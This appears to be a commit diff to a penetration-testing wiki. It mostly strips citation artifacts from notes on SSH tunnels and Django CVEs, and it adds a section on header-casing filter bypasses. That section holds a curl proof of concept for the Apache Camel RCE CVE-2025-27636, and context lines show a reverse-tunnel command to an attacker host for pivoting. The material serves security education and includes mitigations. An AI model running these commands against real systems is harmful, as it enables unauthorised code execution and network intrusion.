Add content from: CVE-2025-27636 – Remote Code Execution in Apache Camel via C...

2025-10-10 18:36:50 +00:00 · 2025-07-10 18:31:15 +00:00 · 2025-07-10 18:31:15 +00:00 · 063e484648
commit 063e484648
parent 31415aa63d
3 changed files with 45 additions and 8 deletions
--- a/src/generic-hacking/tunneling-and-port-forwarding.md
+++ b/src/generic-hacking/tunneling-and-port-forwarding.md
@ -107,7 +107,7 @@ route add -net 10.0.0.0/16 gw 1.1.1.1

 > [!NOTE]
 > **Security – Terrapin Attack (CVE-2023-48795)**  
-> The 2023 Terrapin downgrade attack can let a man-in-the-middle tamper with the early SSH handshake and inject data into **any forwarded channel** ( `-L`, `-R`, `-D` ). Ensure both client and server are patched (**OpenSSH ≥ 9.6/LibreSSH 6.7**) or explicitly disable the vulnerable `chacha20-poly1305@openssh.com` and `*-etm@openssh.com` algorithms in `sshd_config`/`ssh_config` before relying on SSH tunnels. citeturn4search0
+> The 2023 Terrapin downgrade attack can let a man-in-the-middle tamper with the early SSH handshake and inject data into **any forwarded channel** ( `-L`, `-R`, `-D` ). Ensure both client and server are patched (**OpenSSH ≥ 9.6/LibreSSH 6.7**) or explicitly disable the vulnerable `chacha20-poly1305@openssh.com` and `*-etm@openssh.com` algorithms in `sshd_config`/`ssh_config` before relying on SSH tunnels. 

 ## SSHUTTLE

@ -686,7 +686,7 @@ Start the connector:
 cloudflared tunnel run mytunnel
 ```

-Because all traffic leaves the host **outbound over 443**, Cloudflared tunnels are a simple way to bypass ingress ACLs or NAT boundaries. Be aware that the binary usually runs with elevated privileges – use containers or the `--user` flag when possible. citeturn1search0
+Because all traffic leaves the host **outbound over 443**, Cloudflared tunnels are a simple way to bypass ingress ACLs or NAT boundaries. Be aware that the binary usually runs with elevated privileges – use containers or the `--user` flag when possible. 

 ## FRP (Fast Reverse Proxy)

@ -724,7 +724,7 @@ sshTunnelGateway.bindPort = 2200   # add to frps.toml
 ssh -R :80:127.0.0.1:8080 v0@attacker_ip -p 2200 tcp --proxy_name web --remote_port 9000
 ```

-The above command publishes the victim’s port **8080** as **attacker_ip:9000** without deploying any additional tooling – ideal for living-off-the-land pivoting. citeturn2search1
+The above command publishes the victim’s port **8080** as **attacker_ip:9000** without deploying any additional tooling – ideal for living-off-the-land pivoting. 

 ## Other tools to check

@ -734,4 +734,3 @@ The above command publishes the victim’s port **8080** as **attacker_ip:9000**
 {{#include ../banners/hacktricks-training.md}}


-
--- a/src/network-services-pentesting/pentesting-web/django.md
+++ b/src/network-services-pentesting/pentesting-web/django.md
@ -65,15 +65,15 @@ Send the resulting cookie, and the payload runs with the permissions of the WSGI
 ---

 ## Recent (2023-2025) High-Impact Django CVEs Pentesters Should Check
-* **CVE-2025-48432** – *Log Injection via unescaped `request.path`* (fixed June 4 2025). Allows attackers to smuggle newlines/ANSI codes into log files and poison downstream log analysis. Patch level ≥ 4.2.22 / 5.1.10 / 5.2.2. citeturn0search0
-* **CVE-2024-42005** – *Critical SQL injection* in `QuerySet.values()/values_list()` on `JSONField` (CVSS 9.8). Craft JSON keys to break out of quoting and execute arbitrary SQL. Fixed in 4.2.15 / 5.0.8. citeturn1search2
+* **CVE-2025-48432** – *Log Injection via unescaped `request.path`* (fixed June 4 2025). Allows attackers to smuggle newlines/ANSI codes into log files and poison downstream log analysis. Patch level ≥ 4.2.22 / 5.1.10 / 5.2.2. 
+* **CVE-2024-42005** – *Critical SQL injection* in `QuerySet.values()/values_list()` on `JSONField` (CVSS 9.8). Craft JSON keys to break out of quoting and execute arbitrary SQL. Fixed in 4.2.15 / 5.0.8. 

 Always fingerprint the exact framework version via the `X-Frame-Options` error page or `/static/admin/css/base.css` hash and test the above where applicable.

 ---

 ## References
-* Django security release – "Django 5.2.2, 5.1.10, 4.2.22 address CVE-2025-48432" – 4 Jun 2025. citeturn0search0
-* OP-Innovate: "Django releases security updates to address SQL injection flaw CVE-2024-42005" – 11 Aug 2024. citeturn1search2
+* Django security release – "Django 5.2.2, 5.1.10, 4.2.22 address CVE-2025-48432" – 4 Jun 2025. 
+* OP-Innovate: "Django releases security updates to address SQL injection flaw CVE-2024-42005" – 11 Aug 2024. 

 {{#include /banners/hacktricks-training.md}}
--- a/src/network-services-pentesting/pentesting-web/special-http-headers.md
+++ b/src/network-services-pentesting/pentesting-web/special-http-headers.md
@ -193,8 +193,46 @@ Lastly, HSTS is a security feature that forces browsers to communicate with serv
 Strict-Transport-Security: max-age=3153600
 ```

+## Header Name Casing Bypass
+
+HTTP/1.1 defines header field‐names as **case-insensitive** (RFC 9110 §5.1). Nevertheless, it is very common to find custom middleware, security filters, or business logic that compare the *literal* header name received without normalising the casing first (e.g. `header.equals("CamelExecCommandExecutable")`).  If those checks are performed **case-sensitively**, an attacker may bypass them simply by sending the same header with a different capitalisation.
+
+Typical situations where this mistake appears:
+
+* Custom allow/deny lists that try to block “dangerous” internal headers before the request reaches a sensitive component.
+* In-house implementations of reverse-proxy pseudo-headers (e.g. `X-Forwarded-For` sanitisation).
+* Frameworks that expose management / debug endpoints and rely on header names for authentication or command selection.
+
+### Abusing the bypass
+
+1. Identify a header that is filtered or validated server-side (for example, by reading source code, documentation, or error messages).
+2. Send the **same header with a different casing** (mixed-case or upper-case).  Because HTTP stacks usually canonicalise headers only *after* user code has run, the vulnerable check can be skipped.
+3. If the downstream component treats headers in a case-insensitive way (most do), it will accept the attacker-controlled value.
+
+### Example: Apache Camel `exec` RCE (CVE-2025-27636)
+
+In vulnerable versions of Apache Camel the *Command Center* routes try to block untrusted requests by stripping the headers `CamelExecCommandExecutable` and `CamelExecCommandArgs`.  The comparison was done with `equals()` so only the exact lowercase names were removed.
+
+```bash
+# Bypass the filter by using mixed-case header names and execute `ls /` on the host
+curl "http://<IP>/command-center" \
+  -H "CAmelExecCommandExecutable: ls" \
+  -H "CAmelExecCommandArgs: /"
+```
+
+The headers reach the `exec` component unfiltered, resulting in remote command execution with the privileges of the Camel process.
+
+### Detection & Mitigation
+
+* Normalise all header names to a single case (usually lowercase) **before** performing allow/deny comparisons.
+* Reject suspicious duplicates: if both `Header:` and `HeAdEr:` are present, treat it as an anomaly.
+* Use a positive allow-list enforced **after** canonicalisation.
+* Protect management endpoints with authentication and network segmentation.
+
+
 ## References

+- [CVE-2025-27636 – RCE in Apache Camel via header casing bypass (OffSec blog)](https://www.offsec.com/blog/cve-2025-27636/)
 - [https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Disposition](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Disposition)
 - [https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers)
 - [https://web.dev/security-headers/](https://web.dev/security-headers/)